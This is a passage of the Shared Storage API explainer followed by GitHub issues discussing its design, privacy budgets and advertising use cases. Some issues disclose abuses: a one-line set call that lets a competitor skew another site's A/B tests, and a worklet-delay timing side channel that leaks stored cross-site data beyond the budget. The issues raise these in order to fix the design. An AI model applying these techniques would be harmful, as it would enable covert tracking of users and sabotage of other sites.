Allowing noised data as output to the embedder

We could consider allowing the worklet to send data directly to the embedder, with some local differential privacy guarantees. These might look similar to the differential privacy protections that we apply in the Private Aggregation API.

Interactions between worklets

Communication between worklets is not possible in the initial design. However, adding support for this would enable multiple origins to flexibly share information without needing a dedicated origin for that sharing. Relatedly, allowing a worklet to create other worklets might be useful.

Registering event handlers

We could support event handlers in future iterations. For example, a handler could run a previously registered operation when a given key is modified (e.g. when an entry is updated via a set or append call):

sharedStorage.addEventListener(
  'key' /* event_type */,
  'operation-to-run' /* operation_name */,
  { key: 'example-key', actions: ['set', 'append'] } /* options */);

Acknowledgements

Many thanks for valuable feedback and advice from:

Victor Costan, Christian Dullweber, Charlie Harrison, Jeff Kaufman, Rowan Merewood, Marijn Kruisselbrink, Nasko Oskov, Evgeny Skvortsov, Michael Tomaine, David Turner, David Van Cleve, Zheng Wei, Mike West.

shared-storage's Issues

Usage of shared-storage in privacy-sandbox/fledge

Hi!
After reading this proposal, it seems to be fairly close to the FLEDGE proposal ( https://github.com/WICG/turtledove/blob/main/FLEDGE.md ) that is currently being implemented in Chromium.

Can you please shed light on how you see both proposals interacting?
In particular, should we understand that both proposals are "compatible"? By this I mean, would a Fledge bidding worklet be able, within its own worklet, to call sharedStorage.get(key)? (This worklet would be a "fledge" auction worklet and not a "shared-storage" worklet.)

Should worklets get to run past the duration of the page?

This seems necessary since the caller has no idea when the worklet finishes, so how can it know when it can navigate away from the page, unless it’s confident that the worklet will continue to run after the navigation?

We’d need a timeout. How long should it be?

Extending shared storage API to support advanced reach reporting

We are excited about the shared storage API and its support of Reach measurement.

Given that Reach is a fundamental metric of brand advertising and that accurate assessment of ad campaign efficiency requires accurate and flexible reach measurement, we would like to request that the shared storage API extend its functionality to support advanced scenarios of reach measurement in a privacy-safe manner. In particular, it is important that the system scales to thousands of advertisers pulling interactive exploratory reports on ongoing and finished campaigns daily. We believe high utility for Reach advertisers should be achievable with reasonable privacy budget settings.

Privacy Sandbox is critical for maintaining high quality of reach measurement. In the absence of the Privacy Sandbox features discussed below, reach modeling could use domain-partitioned cookies as a signal; however, the lack of a cross-domain deduplication signal poses a huge challenge for unique user count deduplication. It is unclear when and if technology of sufficient quality using domain-partitioned cookies can be developed. Furthermore, development of such technology could potentially pose an extra risk to user privacy, as accurate cross-domain deduplication done in the clear (compared to the on-device nature of Chrome Privacy Sandbox) may have negative effects on user privacy.

Specifically, the following functionality is critical to make sure that important reach reporting scenarios can function with high quality while being powered by shared storage.

  1. Availability of the secure report in the context of the event. The explainer states:

The report contents (e.g. key, value) are encrypted and sent after a delay.

This means that users of the system have to pre-define reporting segments before the ads are served; however, modern advertising reach reporting and optimization use cases enable interactive slicing of the traffic on various criteria directly linked to the event context, such as reporting time window, device type, time of day, location, etc.

Additionally, encoding all of these options into the key rather than creating reports on-demand would put unnecessary strain on the privacy budgets.

On the other hand, it should be possible to add sufficient levels of noise on the final aggregates on demand, to ensure high standards of privacy protection without sacrificing the flexibility of reach slicing without requiring delayed reporting, which further limits the freshness of reporting capabilities.

Therefore we would request you to kindly consider the following approach:

Allow the aggregated report entity to be available immediately in the page JavaScript context so that, at a later time, the ad tech would have the option to upload a batch of the reports for further aggregation. Since aggregated reports are returned unconditionally for each impression, their arrival does not provide any extra information to the ad tech.

Since the final aggregated report would have a differentially private noise and appropriate privacy budget tracking, this option would maintain high privacy protection standards. Meanwhile it would keep the reach slicing flexibility that modern reach reporting flows rely upon now.

Alternatively the report could still be returned with a delay, but be accompanied with an event level identifier that would allow it to be joined to the original event.

  2. Enable a count_distinct secure aggregation function. So far the explainer only mentions the sendHistogramReport function for sending reports.

The histogram report appears to be insufficient for implementation of Virtual People technology in the privacy sandbox. This technology is used by Google and the Cross-Media Measurement project.

Aggregating Histogram with per-bucket noise is insufficient, because each browser gets mapped to a virtual person and the count of virtual people rather than browsers is important. Histogram is good for counting unique browsers by some partitions, but is incapable of counting unique virtual people.

IAB Audience reach measurement guidelines page 4 reads: "deriving unduplicated audience reach people-based measures from digital activity and other research is the most difficult of the metrics however, it is also inherently the most valuable to users of measurement data."

Providing the count_distinct aggregation function would enable a natural implementation of the Virtual People technology, and proper differential privacy noise is capable of ensuring high privacy protection standards.

The count_distinct can be implemented for the buckets of the histogram, so that no new type of report would be required.

To support demographic composition and frequency scenario it should be possible to filter histogram buckets based on index and on the range of the value.

  3. Enable pre-aggregation of the reports for further quick combination at serving time with low latency.

Interactive reports are critical to an advertiser's ability to understand the reach of the campaigns that they are running.

To enable interactive exploration, the aggregation API would need to provide the ability to pre-aggregate histograms and return an encrypted intermediate data structure as the result. Such intermediate reports could then be pre-aggregated for atomic reporting units, and reach for a collection of reporting units could be extracted in real time when a report is required.

  4. Enable combining reports with first-party reports.

Campaigns could be running with some events served on first-party sites and others on third parties. One way to accurately get the deduplicated reach of such a campaign would be to let the secure aggregation server digest a histogram that is constructed by the ad tech in the clear, along with a pre-aggregated encrypted histogram.

  5. Secure aggregation should scale to impression-level reports.

Each ad impression would emit a reach report, and the secure-aggregation infrastructure should be scalable to large volumes to make sure that the reach use case is supported.

Again, thank you very much for providing this flexible, privacy-safe API, and thank you very much for your consideration.

Document considerations relative to leaks via Spectre.

Websites can read their own process's memory via Spectre, with varying bandwidth depending on crossOriginIsolation, platform, and flags.
See: https://leaky.page/

It would be nice to document what measures are taken to prevent communication between:

  • The worklet, which can read the unpartitioned storage but has no capability to exfiltrate the data outside of the two controlled output channels (opaque URLs, the aggregated reporting API)
  • The document/worker, which can't read the unpartitioned storage but has the capability to exfiltrate data (network access).

Disabling Shared Storage through Privacy Sandbox Settings

We have filed a bug to add a setting in the Chrome Privacy Sandbox Settings (chrome://settings/privacySandbox) that would toggle whether Shared Storage was enabled or not, so that a user could disable it. But we haven't worked out exactly what it means for Shared Storage to be disabled.

Does this mean that the API is not available? Or that the API is available, but that all promises are rejected? Or that the API is available, promises are resolved and rejected almost as usual, with the caveat that resolved promises are dummy/null values undetectable to the caller?

In any case, when Shared Storage is disabled, we should not actually store data in or read data from the backend database. Probably this database shouldn't exist anymore and should be wiped at the moment that the user disables Shared Storage. We already have prototype code for clearing the Shared Storage database based on user initiation through Site Settings.

If at some point the user re-enables Shared Storage, then the database can be re-created.

`set`/`append` side channel implementation mitigations

Given that set and append are synchronous, they could create a side channel exposing whether a value is currently set or not, at least if naively implemented (e.g. if setting a value takes a different amount of time based on its presence or lack thereof).
I think it's worthwhile to point that out (e.g. in a note), to ensure implementations are performing the actual setting/appending in an async fashion.

Can a context origin add multiple script modules like other worklets? If so, can they add them in parallel?

Some origins may want to split the Shared Storage worklet operations that they want to register into multiple module files.

Does the current design allow for calling window.sharedStorage.worklet.addModule multiple times in the same context, once for each different module? If so, do the calls get fulfilled in series or in parallel?

If the latter, are there any potential race conditions that we need to consider?

per-entry retention with 'touch' to extend expiration date

The retention policy in the explainer mentions that data will be cleared 30 days after creation, on a per-origin basis. This is not ideal for use cases that need persistent storage for longer than 30 days. I would suggest two changes:

  1. Instead of per-origin retention, we should make the retention per-entry or per-key. Each origin can store many key/values for different use cases. Those key/values can be written at different times and accessed at different cadences. It doesn't make sense to make all entries share the same retention as the very first entry which created the database. Imagine that you want to write a new entry to a database of an origin that was created 29 days ago. Even knowing that this new entry has only a 1-day lifetime (you can learn it from the worklet), there is no way to extend the database's expiration date.

  2. 'Touching' an existing entry with set(key, value, { ignoreIfPresent: true }) (maybe even with sharedStorage.get()) should extend the expiration date of that entry for another 30 days. This will make sure we only clear the entries that are not actively accessed.

URL parser does not return whether a URL was valid

I assume you mean to check for failure. If you actually meant validity you need something else. (Note that implementations sometimes confuse "validity" with "can parse" so you can't really rely on them.)

Transparency of data sources versus data usage

I'm adding this comment in response to the conversation today in the Improving Web Advertising BG about transparency for users. I support being as transparent as possible with users - and also giving them a way to act upon the information given to them. However, I think we should consider whether the transparency would be more useful if it was more about the source of the data than about how it's used. In other words, more "data was collected about you when you visited site X" and less trying to say "you got this ad because you visited site X". My reason is that the logic for how particular data is used isn't necessarily going to be straightforward enough to make much sense on the surface.

For example, I know of an ad campaign for probiotic supplements that was being targeted to people who bought breakfast cereals, soups, canned fruits, or non-diet sodas. Telling a user they're receiving an ad for probiotics because they bought a bottle of Coke or Lucky Charms might not make much sense to them. The logic, btw, is that people who eat foods with high-fructose corn syrup in them likely have a greater need for probiotics. When things like KNN clustering are used, the logic can seem even more mysterious - since it's more about correlation than causation.

In that case, it might be more useful to users if this type of disclosure followed what Amazon does with their recommendations. On the recommendations page, they don't tell you why a particular product is being listed (but you can stop the item from being recommended). Instead, they let you improve the recommendations by letting you decide which products should be used or not. That might be a better user experience than trying to tell users you were recommended this movie because you bought this particular shirt last month.

Anyway, just something to consider.

A/B experiments on contextual ads or a mix of interest-based and contextual ads

Hi,

My understanding is that FLEDGE and TURTLEDOVE include support for contextually targeted ads, which do not need to be rendered in a fenced frame.

A given ad campaign could then be running on contextual signals only, or on both interest-based (TURTLEDOVE/FLEDGE) and contextual data, depending on the result of each ad request. Doing A/B testing on these types of campaigns is an important use case.

How could these use cases be supported by Shared Storage, without having to render contextual ads in a fenced frame?

Interaction between sharedStorage selectURL and runAdAuction

The Protected Audience API (aka FLEDGE) runAdAuction call returns either null or an opaque result. Similarly, the selectURL call response is opaque, with both intended to be rendered in a fenced frame. Unfortunately, using both APIs together seems impractical.

Consider the frequency capping use-case. Note first that the ATPs involved need to decide ahead of time that they want to use the APIs, without knowing whether the user has any relevant interest groups or any relevant frequency capping data in sharedStorage. The outputs of the two calls correspond to ads with different bids. Since the outputs are opaque, it is not possible in general to know how the bids compare, or which opaque output should be preferred. It may be possible to know or predict in some cases; however this seems like a significant gap.

Should it be possible to feed the output of one API into the other in a way that would make selecting based on the maximum bid possible?

Proposal: runURLSelectionOperation() URLs should be k-anonymous

runURLSelectionOperation() allows the caller to choose arbitrary URLs to put into the resulting Fenced Frame. Those urls might include 1p identifiers, which would then mean the fenced frame has a 1p identifier plus a few bits of cross-site data (from the selection operation). If the Fenced Frame has unrestricted network access, then the Fenced Frame can trivially leak the combination of the 1p identifier and those few bits of information.

So, either we don't allow the FF (fenced frame) to have unrestricted network access, or we make sure that the input data to the fenced frame isn't 1p identifying. It seems like it might be easier to make the data not be user identifying, and an approach for that would be to make sure the input is k-anonymous, as is done for FLEDGE.

Note that the notion of using k-anonymity for input URLs is also discussed in #14.

Bad Actor Attacks

There are lots of ways that this API can be abused by bad actors or by competitors. This is more general than the specific issues identified in #2.

The clear() call is very destructive, because it clears all keys for all domains; a site should not be able to clear the keys registered by all other sites. In general this should only be initiated by the user themselves when the user wants to do the equivalent of clearing all third-party cookies. You could modify the API to require the add() and update() calls to include a domain. Clear() would also require a domain and only clear keys associated with that domain. This doesn't prevent a company from deleting its competitor's keys, but it at least makes it so that someone trying to clear their own keys doesn't unintentionally clear those of others.
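For illustration, here is a minimal sketch of what domain-scoped writes and clears could look like; none of these option names exist in the current API, and the shape is purely hypothetical:

// Hypothetical: writes and clears scoped to an explicit domain, per the suggestion above.
await window.sharedStorage.set('experiment-seed', '12345', { domain: 'a.example' });
await window.sharedStorage.clear({ domain: 'a.example' });  // only clears keys registered under a.example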

Today, a domain cannot view/set/modify/delete the cookies of its competitors, because it does not have access to these third-party cookies. However, with this API, anybody can set/modify/delete any keys that they desire. For example, a company can mess with its competitors' A/B tests simply by calling
sharedStorage.set("competitor key", non-random-value, {ignoreIfPresent: false})
With this they can assign everyone to the A side of the test or randomly switch them every time they visit a site running their code, invalidating their competitor's A/B testing.
This attack could be made more difficult if the set() call supported an option, noUpdates, which if true means that the key, once set, can never be modified. If the competitor sets the value before the owning company, they may still skew the results, but they will not be able to break any test where the user has already been assigned a value.
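A minimal sketch of the proposed noUpdates option (the option name and behaviour are hypothetical, taken from the paragraph above):

// Hypothetical: once a key has been written with noUpdates, later writes to it are ignored.
await window.sharedStorage.set('experiment-seed', '12345', { noUpdates: true });

// A later attempt by other script running in this origin's context would have no effect:
await window.sharedStorage.set('experiment-seed', 'attacker-chosen-value');  // ignored under this proposal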

Another option for the A/B use case would be to only support setting the seed within the SelectURLOperation() call and require that all URLs passed to the call share the same domain. Then the seed can be tied only to that domain and only available for use in future SelectURLOperation calls for that same domain.

What's the standards track for this?

I just had a read through of the explainer, which standards group will it be discussed in? What’s the track for it to be discussed in the open & receive feedback from the wider web creator and browser community?

Delete exported custom anchors

The <pre class="anchors"> section is huge and includes lots of terms whose <dfn> includes data-export. (e.g. https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object, https://html.spec.whatwg.org/multipage/nav-history-apis.html#window-bc, https://url.spec.whatwg.org/#concept-url-origin) You should delete those because having a custom anchor for a term prevents the term from following moves in the source document.

For non-exported terms in web specs, it's best to file an issue or PR asking to export the term. Sometimes the editor will point out a better way to integrate with their spec.

Guarantees and ordering of asynchronous API methods

Our API surface consists of asynchronous methods. Their behavior may lead to race conditions if developers are not fully aware of what guarantees, if any, can be made about how they work.

What kinds of things can be said about the following situations, for example?

  • What happens if runOperation is called immediately after another runOperation? Do they run in series or in parallel? Are they guaranteed to run in the order they were called?
  • If I call set, and then call runOperation on the next line, am I guaranteed that the set will complete before the next read operation happens in the runOperation? (A sketch of both sequences follows this list.)
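For concreteness, a minimal sketch of the sequences these questions are about; whether the explicit awaits below are required, or whether ordering is guaranteed without them, is exactly what needs to be specified (the method and operation names here follow the issue's wording and are illustrative):

await window.sharedStorage.worklet.addModule('ops.js');

// Is this write guaranteed to be visible inside the operation below,
// or must the caller await the set() before invoking runOperation()?
window.sharedStorage.set('counter', '1');
await window.sharedStorage.runOperation('increment-and-report');

// Two operations queued back to back: series, parallel, or unspecified order?
window.sharedStorage.runOperation('op-a');
window.sharedStorage.runOperation('op-b');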

Removing max key count, max key length, and max value length in favor of max db size

Since shared storage is cross-site data, just knowing the size of your origin's shared storage database could leak significant information. Therefore, Shared Storage is not quota managed, and the size of the origin's database is not web exposed.

Because it's not quota managed, we've put a cap on the size of each origin's shared storage database. But we enforced that cap by limiting the key and value lengths, and the number of possible keys. In retrospect that seems overly constraining to me, when we could instead just have a single size limit for the origin that we enforce, allowing developers to use that space as they see fit.

Any thoughts or comments on making such a change? I don't have anyone asking for this change right now so it's not high priority, but would be interested to hear from folks.

Cross-tab communication via events

So recently our team got hit by the Storage Partitioning flag rollout in the latest Chrome versions, which broke our mechanism for cross-tab communication via localStorage events.
We have a setup where site a.example.com embeds an iframe from site b.example.com, and a user action on a.example.com opens a new browser tab on the b.example.com domain. Previously we were relying on localStorage events for communication between those two tabs, but now, due to storage partitioning, that's no longer possible.
It seems that Shared Storage is designed to provide secure cross-site unpartitioned storage, but searching through the documentation I haven't found whether something like storage events is available with Shared Storage. Does it sound like Shared Storage is capable of helping in my case? Thanks in advance!

iFrame using own local storage

An iframe that uses its own localStorage, with a source that is different from the domain of the website it is contained in, will be blocked by Chrome's 2024 third-party cookie proposal, even if the iframe does not read or use any content of the parent's storage.

My question is: will Shared Storage solve this problem, and how?
From what I've understood, the Shared Storage API (together with fenced frames) allows this particular behaviour between sites and embedded frames that only require private storage for storing their own data.

Spec: SharedStorageWorkletGlobalScope does not expose sharedStorage

The SharedStorageWorkletGlobalScope IDL should expose a readonly attribute SharedStorage sharedStorage. This might need to be a WorkletSharedStorage, but we'd need to ensure alignment with the implementation, as that currently handles the differences between windows and worklets by using [Exposed=] markers on each individual function.

Supporting server-side (e.g. pre-ads-auction) experiments

Hi! I'm really excited to see that this Shared Storage API proposal is trying to create a solution for cross-site experiments. However the current proposal seems best suited for experimenting on within-browser changes, such as additional filtering after an ad network has already delivered an ad. We're strongly interested in enabling user-consistent cross-site server-side experiments, such as controlling whether a new ad format type would even be included in the initial server-side auction, or changing how an ad creative is rendered before it's sent to the browser.

Are there options here to expand this design to better suit server-side experiments (or possibly even experiments with simultaneous client and server-side changes)? There's a very large number of different types of filtering and logic that happens on server-side, so we'd really appreciate a solution that can scale well to a variety of use cases.

If you're uncertain about requirements, here's a few of ours that may be helpful as you think about this:

  • Experiments are about comparing aggregated metrics across groups of users; we do not need or care about identifying individuals within the groups. This means we are happy with solutions that are k-anonymous, and we can work with relatively high sizes of k.
  • We are okay with some level of noise being added to the user consistency. User bucketing signals available on the web today are already somewhat noisy.
  • Needs to scale to at least O(hundreds) of experiments/groups, but we prefer O(thousands).

As a potential starting point idea for you to consider, if you're able to allow third-parties access to a k-anonymous, random bucket ID that's user-sticky and consistent across sites, this would allow us to run cross-site experiments. Each 3rd party (e.g. the ad network) would want an independent user-to-bucket grouping so they don't influence one another's metrics, and that should also benefit the user by making it harder to identify common users across different 3rd parties. It'd be nice if the number of bucket IDs available to a 3rd party was proportional to the traffic the party receives since anonymity is closely tied to the underlying population - e.g. 1 bit can be identifying if you have 2 users, but it's not identifying if it's evenly split among 1000 users. I haven't fully thought through all the attack vectors and privacy implications here so I imagine this rough idea will need improvement. Please let me know if there's further details you'd like to discuss, and thanks for your time.

Clarification on Keys/Values

@jkarlin We were talking about this spec internally and realized that a couple of us had different interpretations of what would be allowable within the stored keys and values. I'm under the impression that keys and values can be arbitrary strings, and we can run arbitrary code over those strings to produce values for the Aggregate Reporting API.

For example, let's take as a use case that advertisers wish to understand their sales cycle better, and want to measure the average time from first impression served to conversion. Could we do something like (pardon my pseudo-JS/python mix):

function getTimestamp() { … }
await window.sharedStorage.worklet.addModule("timetoconversion.js");

// At impression time
window.sharedStorage.set("conversion-timestamps", getTimestamp() + "-", {ignoreIfPresent: true});

// At conversion time
window.sharedStorage.append("conversion-timestamps", getTimestamp());
await window.sharedStorage.runOperation("time-to-conversion");

With timetoconversion.js containing:

class SendTimeToConversionReportOperation {
  async run() {
    const timestamps = await this.sharedStorage.get("conversion-timestamps");
    const [t1, t2] = timestamps.split("-");
    const time = parseInt(t2) - parseInt(t1);

    this.createAndSendAggregatableReport({
      operation: "sum",  // sum all time delays so we can compute an average later
      key: "time-to-conversion",
      value: time
    });
  }
}
registerOperation("time-to-conversion", SendTimeToConversionReportOperation);

Does this make sense? Thanks in advance for any guidance!

Replacing k-anonymity requirement for `selectURL()` with per-page-load entropy bit budgets

We are soliciting feedback on the following proposal:

We propose removing the requirement that input URLs for sharedStorage.selectURL() be k-anonymous.

Given that we currently have event-level reporting, we believe a k-anonymity requirement would be of limited benefit and not worth the associated financial, performance, and utility costs.

Instead, each page load would have two entropy-bit budgets: an overall page budget and a per-origin page budget. These budgets are in addition to and separate from the daily budget for navigation.

Each time selectURL() is called during that page load, log2(num_urls) would be charged to both the overall budget and the per-origin budget for the caller's origin, as long as there is sufficient budget remaining in both. If either budget has insufficient remaining capacity, then the default URL is returned from selectURL() and no budget charges are made.

We plan to use 12 bits as the page-load overall budget, and 6 bits as the page-load per-origin budget.
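As a rough sketch of the proposed accounting under these numbers (the helper below is illustrative only, not part of the API):

// Illustrative budget accounting for a single page load, per the proposal above.
const PAGE_BUDGET_BITS = 12;        // overall page-load budget
const PER_ORIGIN_BUDGET_BITS = 6;   // per-origin page-load budget

function chargeForSelectURL(numUrls, pageRemaining, originRemaining) {
  const charge = Math.log2(numUrls);
  if (charge > pageRemaining || charge > originRemaining) {
    // Insufficient budget in either: the default URL is returned and nothing is charged.
    return { result: 'default', pageRemaining, originRemaining };
  }
  return { result: 'selected',
           pageRemaining: pageRemaining - charge,
           originRemaining: originRemaining - charge };
}

// e.g. an 8-URL call charges log2(8) = 3 bits to both budgets; a third 8-URL call from the
// same origin would exceed its 6-bit per-origin budget and fall back to the default URL.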

Drive-by feedback

Handling inactive/detached documents

The spec right now unconditionally assumes that a Window's browsing context is non-null (this happens in several places throughout the spec).

In order to handle the detached frame case:

const win = iframe.contentWindow;
iframe.remove();
win.sharedStorage.set()/append()/foo();

... and not crash, we have to bail out early from algorithms that should not operate in this case. You can do this by detecting the null browsing context as you are, but then you miss the bfcache case as well, so your best bet is to detect non-fully-active documents as described by https://w3ctag.github.io/design-principles/#support-non-fully-active. Here is a good example of this: https://w3c.github.io/permissions/#dom-permissions-query.

Nothing defines how the shared storage interface is exposed

At least I don't think anything defines this. The examples in the Introduction show usage of window.sharedStorage, but I don't see the sharedStorage member actually being defined on the Window interface (if I'm just missing it, forgive me). The closest I see is https://wicg.github.io/shared-storage/#shared-storage-interface, which defines that the interfaces are "exposed" on Window but stops short of defining a name and getter. I think you can fix this by adding something similar to https://wicg.github.io/fenced-frame/#window-extension, where we define how the Fence interface is exposed via window.fence. This would clear up the many lines like this:

Let context be WindowSharedStorage's Window's browsing context.

... and this:

Let context be WorkletSharedStorage's SharedStorageWorkletGlobalScope's outside settings's target browsing context.

... which I don't think are 100% right.

(You might even want to consider doing what we (the fenced frame spec people) should probably do, which is make the getter off of Window just return null in the non-fully-active Document case. Then you don't have to keep adding the inactive checks in all of the other individual APIs.)

Indirect member references

Lines like:

Let queue be context’s associated shared storage database queue.

Are a tiny bit confusing since there is no member called "shared storage database queue" on browsing context. It might be better to make this:

Let queue be context’s associated database's shared storage database queue.

Bad promise resolution

This includes both in-parallel promise resolution and cross-event-loop promise resolution. I noticed that in selectURL(), we resolve indexPromise in an event loop other than the one it was created in, which I don't think is allowed. The closest documentation I found for this is this example in HTML stating that you cannot resolve a promise in parallel, but I think more generally the guidance is that you must resolve promises in the event loop they were created in.

Another example of this is in https://wicg.github.io/shared-storage/#dom-workletsharedstorage-append, where while in parallel, step 8 > step 4 resolves the promise, but I don't think this is valid. This must queue a task to the outer event loop per the previous HTML link I referenced. There may be other examples (delete() seems like one) in your specification where this could be fixed.

Misc

  • I noticed in https://wicg.github.io/shared-storage/#report-budget, we define a new member on each "top-level traversable". Just as an FYI, this excludes the top-level browsing context inside of a fenced frame. Is that the intention? In Chrome-implementation-speak, HTML's top-level traversable concept is 1:1 with "primary" frame in the browsing context, whereas "traversable navigable" is any main frame, including ones inside fenced frames. Just wanted to call this out to make sure we thought it through since our terminology is not super duper clear heh :/
  • The https://wicg.github.io/shared-storage/#dom-windowsharedstorage-selecturl algorithm steps seem to be numerically split by the "Issue:" after step 6. Maybe the "Issue:" needs to be indented more?

Clarifying my understanding of the Shared Storage API proposal

Hi! I'm trying to understand how this proposal might work for cross-domain A/B experiments (e.g. trying to enable the same treatment on the same subset of users across 2 different websites). I've described below my current understanding of how the Shared Storage API proposal works, as well as some questions on parts I'm unsure of. Could you please help clarify any parts I misunderstood?

Shared Storage

Anyone can write to the shared storage but there are limits on who and what content can be read from it.

  • Question: How do you prevent domains stomping on one another's content? And what prevents a company from reading a different company's content?

Worklets

Websites can also write functions (called "worklets") that Chrome will execute in-browser based on the contents of the shared storage. The worklets can edit the shared storage, trigger the aggregated reporting workflow, or return content in an opaque URL, but not anything beyond that.

  • E.g. a party could write a unique identifier (called a seed) to the shared storage, and perform different treatment based on a modulus of the identifier. Put otherwise, the user could be assigned to one of N different treatment groups but would be consistently assigned the same treatment.

    • It seems like there might be very low limits on N, but it's unclear how N is determined. Further comments show N is expected to stay under 10.

    • Question: Why does N need to be so small? Is there room to scale larger if your base population is large enough? While a small number of bits can be identifying if you have a small number of users, it's possible to have large numbers that aren't identifying if there's a large number of users, as long as the numbers are evenly distributed. Given that this proposal already requires aggregated reporting, would it be feasible for someone to run more types of treatment and just wait longer until enough users are in each treatment group to safely generate the aggregate report?

  • Is there any way to support multiple independent treatments with different user splits? E.g. if one treatment coloured the website background red and another treatment changed the font, could the users be split into these experiments independently such that some arbitrary subset of users might be in both?

  • Anything the function calls or loads needs to be done via opaque URL. In the long term, everything loadable via opaque URL should be a blob that's downloaded ahead of time and available offline. Put otherwise, visiting this URL wouldn't result in a server call when the user's browser actually accesses it.

    • This likely means that the content within this URL should be limited to something that could be executed in browser. Which also means that it can't pass relevant info to the serving call to trigger server-side treatment changes. Thus it doesn't enable running user-consistent A/B experiments that affect server-side behaviour.
  • "Operations defined by one context are not invokable by any other contexts." -> I'm not sure what this means. Does it mean we couldn't rerun the same treatment on different domains?

  • Unclear how flexible these functions/worklets are aside from letting you pick between 1 of 5 opaque URLs. Can you actually change behaviour in these functions, or does the behaviour change need to be within the URL? If the former, can you apply different worklets to different situations, so that you get behaviour changes for some situations and URLs for others?

Aggregated Reporting

The only way to get info back about your treatment is sending metrics in aggregate.

  • Seems like you can write as many metrics as you want as long as it's in key-value pairs, but you can only get aggregate results returned to your servers at some time interval.

  • Is there any built-in support for splitting the metrics by treatment groups, or do you have to manually write each group to a different metric key?

  • Will the metrics include confidence intervals?

Leaking more than log_2(|URLs|) bits of data with the selectURL gate

You can delay when the selectURL gate makes a request by delaying when the run function registered in the worklet returns. By doing this you can pass information to a server based on how quickly it receives the request relative to an earlier request, and use those delays to learn what value was stored with the API.

If you make a call to selectURL and only pass in a single URL it will not decrease the privacy budget as it is currently described since the request can only go to that one URL and log_2(1)=0, but delaying the request, based on a stored value, can still allow you to leak data that is not accounted for in the privacy budget. While the obfuscated URL or fenced frame config is returned almost immediately, the actual request can’t be made until the function returns. The simplest case involves either including a hardcoded delay or no delay before returning, although conceptually there is no reason you couldn’t use different lengths of delays to pass more information to the server (e.g., no delay, short delay, long delay) or tailor the delays to the current network conditions.
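A minimal sketch of the delay channel described above (the operation name, stored key, and delay mechanism are all illustrative; the demonstration linked below used a hardcoded 2-second delay):

// delay-worklet.js: delay the return of run() based on a previously stored value, so the
// time at which the fenced frame's request reaches the server encodes that value.
class DelayedSelectOperation {
  async run(data, urls) {
    const bit = await this.sharedStorage.get('stored-bit');  // illustrative key
    if (bit === '1') {
      // Busy-wait ~2 seconds before returning; only one URL is passed in,
      // so log2(1) = 0 bits are charged to the privacy budget.
      const start = Date.now();
      while (Date.now() - start < 2000) { /* spin */ }
    }
    return 0;
  }
}
register('delayed-select', DelayedSelectOperation);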

Below are links to two different websites that include the same third-party HTML in an iframe (light blue) which creates a persistent identifier that is transmitted as delays (hardcoded to be 2 seconds for this example) between requests for each of the fenced frames. The screenshots of the network waterfalls for the two sites are included below.

Website 1: https://anisenoff.github.io/sharedstorage/request.html?q=delay_header
Website 2: https://www.andrew.cmu.edu/user/anisenof/sharedstorage/request.html?q=delay_header

[Screenshots: network waterfalls for Website 1 and Website 2]

Note: The links above were tested in Chrome version 114.0.5735.90

Furthermore, allowing the resources to be loaded into iframes appears to open up the possibility of caching attacks (learning which resource was loaded by a call to selectURL on subsequent visits to a site, without decrementing the privacy budget), and possibly other side-channel attacks.

Fenced frames APIs specific to shared storage should be specified in this spec

Fenced frames recently got feedback from the TAG that shared storage seemed like an explicit dependency of the fenced frame specification due to some of the shared-storage-specific APIs appearing in that specification:

If fenced frames has the opportunity to ascend to something like the WHATWG before this specification, for example, then the fenced frame feature should probably not normatively include APIs that are specific to this feature. Therefore I think it's best if the bits above were specified in the shared storage spec as extensions of the fenced frame specification.

A/B test experiment and communication with Fledge worklets

Hi,

As discussed Tuesday, it would be great to have this shared storage available in the buyer or seller worklets in FLEDGE (which are themselves opaque).

Indeed, in the current setup, the A/B test can only be performed once the winner has been chosen (as you can query with only 5 URLs, which are therefore related to the winning campaign only).
It is therefore impossible to do a bidding A/B test, for instance (where you bid more or less, or differently, on a given set of users).

This is a very important use case for online advertising.

Many thanks,
Basile

Number of bits for the selectURL output gate

The explainer states that "The chosen URL represents up to log2(num urls) bits of cross-site information", but it's not immediately obvious (to me) why that's the case. Expanding on it (inline in the explainer, or in a separate document) would be appreciated! :)

Should the domain of the shared storage script be restricted?

Can A.com load a shared storage worklet from a domain other than A.com? This seems to come down to how much you trust the entities on your page. E.g., if the top frame embeds untrusted script, that untrusted script might create worklets that report bogus aggregate data to poison the site's aggregate data.

Generally, the web does not protect documents from embedding scripts that could do terrible things. Should that same precedent apply here?

Shared Storage use cases within Fenced Frame

Currently, Fenced Frames disallow all Permission policies for privacy reasons.

Shared Storage is going to add its permissions policy as well. The following Shared Storage use cases will benefit from being allowed from inside the Fenced Frame:

  • A/B Experiments - Shared storage allows for assigning experiment groups to users and selecting between up to 8 different urls to display to a user. The URL selection is done from a javascript worklet, and the selected URL is rendered by a fenced frame. However, to measure the effectiveness of the experiment, the organization needs to be able to send a report to an aggregation service. It is important to send the report from within the fenced frame, and not from within the JS worklet, as orgs will want to confirm the content successfully loaded prior to sending a report, which is particularly important if the content is an ad a brand is paying for. 
  • Multiple, nested url selection calls - while likely a future use case, there is a potential need to allow multiple organizations to utilize shared storage to prevent one entity further upstream (say for example in an ad decision chain) from preventing other organizations from utilizing shared storage (we will need to ensure we are “budgeting” properly for entropy leakage, hence why it is a future/under consideration use case). It is likely that if an SSP uses some information from shared storage to then render a URL within a fenced frame pointing to a DSP, that the DSP would be unable to reference information in its own shared storage to further refine the ad decision. 

Questions about the explainer on behalf of an ad server

I'm trying to envision how an established ad server could utilize shared storage to implement frequency capping, a/b testing, remarketing, and rotating creatives in a sequence at the user-level. A few questions:

  • Is the limit of 5 URLs set in stone? For campaigns that select a creative based on a combination of frequency-capping, a/b testing, and remarketing, we can easily run into the 5 URL limit. One of these 5 URLs will be used as a default in case the user does not fit into any of the specified categories. We would like the maximum flexibility possible, while preserving the user’s privacy.
  • I found this part of the explainer hard to understand:

However, a leak of up to log(n) bits (where n is the size of the list) is possible when the fenced frame is clicked, as a navigation that embeds the selected URL may occur.

Can you describe the idea further?

Support event-level reporting for `selectURL()` in the short term

For utility and adoptability, prior to the deprecation of third-party cookies, we will need to support event-level reporting for sharedStorage.selectURL() in a manner that is roughly equivalent to what the FLEDGE API has implemented in their registerAdBeacon().

We propose updating the urls parameter, which is currently an array of URLs, to an array of dictionaries where the metadata can be omitted, e.g. in the following example:

var opaqueURL = await window.sharedStorage.selectURL(
  "select-url-for-experiment",
  [{url: "blob:https://a.example/123…", report_event: "click", report_url: "https://report.example/1..."},
   {url: "blob:https://b.example/abc…", report_event: "click", report_url: "https://report.example/a..."},
